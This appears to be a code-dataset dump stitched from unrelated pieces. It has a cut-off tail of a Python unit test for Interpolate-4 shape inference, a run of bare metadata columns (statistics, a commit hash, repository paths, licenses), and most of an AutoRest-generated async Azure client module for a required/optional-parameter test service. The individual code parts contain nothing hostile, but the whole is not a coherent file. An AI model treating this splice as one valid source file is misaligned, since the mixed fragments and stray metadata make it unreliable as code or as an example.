graph = build_graph(nodes_attrs=graph_node_attrs_without_axes,
edges=graph_edges_without_axes,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end),
'shape_calculation_mode': 'scales'}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, output_shape,
graph.node['interpolate_data']['shape']))
| 64.30597
| 116
| 0.459267
| 2,356
| 17,234
| 3.252122
| 0.059423
| 0.016445
| 0.010963
| 0.026103
| 0.945184
| 0.925346
| 0.925346
| 0.912555
| 0.908249
| 0.897155
| 0
| 0.22483
| 0.325113
| 17,234
| 267
| 117
| 64.546816
| 0.433927
| 0.004468
| 0
| 0.861925
| 1
| 0
| 0.147487
| 0.00991
| 0
| 0
| 0
| 0
| 0.016736
| 1
| 0.016736
| false
| 0
| 0.029289
| 0
| 0.050209
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e8abc6a230c9824f45db671402a65233b9186aef
| 53,791
|
py
|
Python
|
test/vanilla/version-tolerant/Expected/AcceptanceTests/RequiredOptionalVersionTolerant/requiredoptionalversiontolerant/aio/operations/_operations.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/RequiredOptionalVersionTolerant/requiredoptionalversiontolerant/aio/operations/_operations.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/RequiredOptionalVersionTolerant/requiredoptionalversiontolerant/aio/operations/_operations.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | 1
|
2022-03-28T08:58:03.000Z
|
2022-03-28T08:58:03.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, IO, List, Optional, TypeVar
import warnings
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from ...operations._operations import (
build_explicit_post_optional_array_header_request,
build_explicit_post_optional_array_parameter_request,
build_explicit_post_optional_array_property_request,
build_explicit_post_optional_class_parameter_request,
build_explicit_post_optional_class_property_request,
build_explicit_post_optional_integer_header_request,
build_explicit_post_optional_integer_parameter_request,
build_explicit_post_optional_integer_property_request,
build_explicit_post_optional_string_header_request,
build_explicit_post_optional_string_parameter_request,
build_explicit_post_optional_string_property_request,
build_explicit_post_required_array_header_request,
build_explicit_post_required_array_parameter_request,
build_explicit_post_required_array_property_request,
build_explicit_post_required_class_parameter_request,
build_explicit_post_required_class_property_request,
build_explicit_post_required_integer_header_request,
build_explicit_post_required_integer_parameter_request,
build_explicit_post_required_integer_property_request,
build_explicit_post_required_string_header_request,
build_explicit_post_required_string_parameter_request,
build_explicit_post_required_string_property_request,
build_explicit_put_optional_binary_body_request,
build_explicit_put_required_binary_body_request,
build_implicit_get_optional_global_query_request,
build_implicit_get_required_global_path_request,
build_implicit_get_required_global_query_request,
build_implicit_get_required_path_request,
build_implicit_put_optional_binary_body_request,
build_implicit_put_optional_body_request,
build_implicit_put_optional_header_request,
build_implicit_put_optional_query_request,
)
T = TypeVar("T")
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ImplicitOperations:
"""ImplicitOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def get_required_path(self, path_parameter: str, **kwargs: Any) -> None:
"""Test implicitly required path parameter.
:param path_parameter:
:type path_parameter: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_implicit_get_required_path_request(
path_parameter=path_parameter,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
get_required_path.metadata = {"url": "/reqopt/implicit/required/path/{pathParameter}"} # type: ignore
@distributed_trace_async
async def put_optional_query(self, *, query_parameter: Optional[str] = None, **kwargs: Any) -> None:
"""Test implicitly optional query parameter.
:keyword query_parameter:
:paramtype query_parameter: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_implicit_put_optional_query_request(
query_parameter=query_parameter,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
put_optional_query.metadata = {"url": "/reqopt/implicit/optional/query"} # type: ignore
@distributed_trace_async
async def put_optional_header(self, *, query_parameter: Optional[str] = None, **kwargs: Any) -> None:
"""Test implicitly optional header parameter.
:keyword query_parameter:
:paramtype query_parameter: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_implicit_put_optional_header_request(
query_parameter=query_parameter,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
put_optional_header.metadata = {"url": "/reqopt/implicit/optional/header"} # type: ignore
@distributed_trace_async
async def put_optional_body(self, body_parameter: Optional[str] = None, **kwargs: Any) -> None:
"""Test implicitly optional body parameter.
:param body_parameter:
:type body_parameter: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if body_parameter is not None:
_json = body_parameter
else:
_json = None
request = build_implicit_put_optional_body_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
put_optional_body.metadata = {"url": "/reqopt/implicit/optional/body"} # type: ignore
@distributed_trace_async
async def put_optional_binary_body(self, body_parameter: Optional[IO] = None, **kwargs: Any) -> None:
"""Test implicitly optional body parameter.
:param body_parameter:
:type body_parameter: IO
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/octet-stream") # type: Optional[str]
_content = body_parameter
request = build_implicit_put_optional_binary_body_request(
content_type=content_type,
content=_content,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
put_optional_binary_body.metadata = {"url": "/reqopt/implicit/optional/binary-body"} # type: ignore
@distributed_trace_async
async def get_required_global_path(self, **kwargs: Any) -> None:
"""Test implicitly required path parameter.
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_implicit_get_required_global_path_request(
required_global_path=self._config.required_global_path,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
get_required_global_path.metadata = {"url": "/reqopt/global/required/path/{required-global-path}"} # type: ignore
@distributed_trace_async
async def get_required_global_query(self, **kwargs: Any) -> None:
"""Test implicitly required query parameter.
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_implicit_get_required_global_query_request(
required_global_query=self._config.required_global_query,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
get_required_global_query.metadata = {"url": "/reqopt/global/required/query"} # type: ignore
@distributed_trace_async
async def get_optional_global_query(self, **kwargs: Any) -> None:
"""Test implicitly optional query parameter.
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_implicit_get_optional_global_query_request(
optional_global_query=self._config.optional_global_query,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
get_optional_global_query.metadata = {"url": "/reqopt/global/optional/query"} # type: ignore
class ExplicitOperations:
"""ExplicitOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def put_optional_binary_body(self, body_parameter: Optional[IO] = None, **kwargs: Any) -> None:
"""Test explicitly optional body parameter.
:param body_parameter:
:type body_parameter: IO
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/octet-stream") # type: Optional[str]
_content = body_parameter
request = build_explicit_put_optional_binary_body_request(
content_type=content_type,
content=_content,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
put_optional_binary_body.metadata = {"url": "/reqopt/explicit/optional/binary-body"} # type: ignore
@distributed_trace_async
async def put_required_binary_body(self, body_parameter: IO, **kwargs: Any) -> None:
"""Test explicitly required body parameter.
:param body_parameter:
:type body_parameter: IO
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/octet-stream") # type: Optional[str]
_content = body_parameter
request = build_explicit_put_required_binary_body_request(
content_type=content_type,
content=_content,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
put_required_binary_body.metadata = {"url": "/reqopt/explicit/required/binary-body"} # type: ignore
@distributed_trace_async
async def post_required_integer_parameter(self, body_parameter: int, **kwargs: Any) -> None:
"""Test explicitly required integer. Please put null and the client library should throw before
the request is sent.
:param body_parameter:
:type body_parameter: int
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = body_parameter
request = build_explicit_post_required_integer_parameter_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_integer_parameter.metadata = {"url": "/reqopt/requied/integer/parameter"} # type: ignore
@distributed_trace_async
async def post_optional_integer_parameter(self, body_parameter: Optional[int] = None, **kwargs: Any) -> None:
"""Test explicitly optional integer. Please put null.
:param body_parameter:
:type body_parameter: int
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if body_parameter is not None:
_json = body_parameter
else:
_json = None
request = build_explicit_post_optional_integer_parameter_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_integer_parameter.metadata = {"url": "/reqopt/optional/integer/parameter"} # type: ignore
@distributed_trace_async
async def post_required_integer_property(self, body_parameter: JSONType, **kwargs: Any) -> None:
"""Test explicitly required integer. Please put a valid int-wrapper with 'value' = null and the
client library should throw before the request is sent.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"value": 0 # Required.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = body_parameter
request = build_explicit_post_required_integer_property_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_integer_property.metadata = {"url": "/reqopt/requied/integer/property"} # type: ignore
@distributed_trace_async
async def post_optional_integer_property(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
"""Test explicitly optional integer. Please put a valid int-wrapper with 'value' = null.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"value": 0 # Optional.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if body_parameter is not None:
_json = body_parameter
else:
_json = None
request = build_explicit_post_optional_integer_property_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_integer_property.metadata = {"url": "/reqopt/optional/integer/property"} # type: ignore
@distributed_trace_async
async def post_required_integer_header(self, *, header_parameter: int, **kwargs: Any) -> None:
"""Test explicitly required integer. Please put a header 'headerParameter' => null and the client
library should throw before the request is sent.
:keyword header_parameter:
:paramtype header_parameter: int
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_explicit_post_required_integer_header_request(
header_parameter=header_parameter,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_integer_header.metadata = {"url": "/reqopt/requied/integer/header"} # type: ignore
@distributed_trace_async
async def post_optional_integer_header(self, *, header_parameter: Optional[int] = None, **kwargs: Any) -> None:
"""Test explicitly optional integer. Please put a header 'headerParameter' => null.
:keyword header_parameter:
:paramtype header_parameter: int
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_explicit_post_optional_integer_header_request(
header_parameter=header_parameter,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_integer_header.metadata = {"url": "/reqopt/optional/integer/header"} # type: ignore
@distributed_trace_async
async def post_required_string_parameter(self, body_parameter: str, **kwargs: Any) -> None:
"""Test explicitly required string. Please put null and the client library should throw before the
request is sent.
:param body_parameter:
:type body_parameter: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = body_parameter
request = build_explicit_post_required_string_parameter_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_string_parameter.metadata = {"url": "/reqopt/requied/string/parameter"} # type: ignore
@distributed_trace_async
async def post_optional_string_parameter(self, body_parameter: Optional[str] = None, **kwargs: Any) -> None:
"""Test explicitly optional string. Please put null.
:param body_parameter:
:type body_parameter: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if body_parameter is not None:
_json = body_parameter
else:
_json = None
request = build_explicit_post_optional_string_parameter_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_string_parameter.metadata = {"url": "/reqopt/optional/string/parameter"} # type: ignore
@distributed_trace_async
async def post_required_string_property(self, body_parameter: JSONType, **kwargs: Any) -> None:
"""Test explicitly required string. Please put a valid string-wrapper with 'value' = null and the
client library should throw before the request is sent.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"value": "str" # Required.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = body_parameter
request = build_explicit_post_required_string_property_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_string_property.metadata = {"url": "/reqopt/requied/string/property"} # type: ignore
@distributed_trace_async
async def post_optional_string_property(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
"""Test explicitly optional integer. Please put a valid string-wrapper with 'value' = null.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"value": "str" # Optional.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if body_parameter is not None:
_json = body_parameter
else:
_json = None
request = build_explicit_post_optional_string_property_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_string_property.metadata = {"url": "/reqopt/optional/string/property"} # type: ignore
@distributed_trace_async
async def post_required_string_header(self, *, header_parameter: str, **kwargs: Any) -> None:
"""Test explicitly required string. Please put a header 'headerParameter' => null and the client
library should throw before the request is sent.
:keyword header_parameter:
:paramtype header_parameter: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_explicit_post_required_string_header_request(
header_parameter=header_parameter,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_string_header.metadata = {"url": "/reqopt/requied/string/header"} # type: ignore
@distributed_trace_async
async def post_optional_string_header(self, *, body_parameter: Optional[str] = None, **kwargs: Any) -> None:
"""Test explicitly optional string. Please put a header 'headerParameter' => null.
:keyword body_parameter:
:paramtype body_parameter: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_explicit_post_optional_string_header_request(
body_parameter=body_parameter,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_string_header.metadata = {"url": "/reqopt/optional/string/header"} # type: ignore
@distributed_trace_async
async def post_required_class_parameter(self, body_parameter: JSONType, **kwargs: Any) -> None:
"""Test explicitly required complex object. Please put null and the client library should throw
before the request is sent.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"id": 0, # Required.
"name": "str" # Optional.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = body_parameter
request = build_explicit_post_required_class_parameter_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_class_parameter.metadata = {"url": "/reqopt/requied/class/parameter"} # type: ignore
@distributed_trace_async
async def post_optional_class_parameter(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
"""Test explicitly optional complex object. Please put null.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"id": 0, # Required.
"name": "str" # Optional.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if body_parameter is not None:
_json = body_parameter
else:
_json = None
request = build_explicit_post_optional_class_parameter_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_optional_class_parameter.metadata = {"url": "/reqopt/optional/class/parameter"} # type: ignore
@distributed_trace_async
async def post_required_class_property(self, body_parameter: JSONType, **kwargs: Any) -> None:
"""Test explicitly required complex object. Please put a valid class-wrapper with 'value' = null
and the client library should throw before the request is sent.
:param body_parameter:
:type body_parameter: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
body_parameter = {
"value": {
"id": 0, # Required.
"name": "str" # Optional. Required.
}
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = body_parameter
request = build_explicit_post_required_class_property_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
post_required_class_property.metadata = {"url": "/reqopt/requied/class/property"} # type: ignore
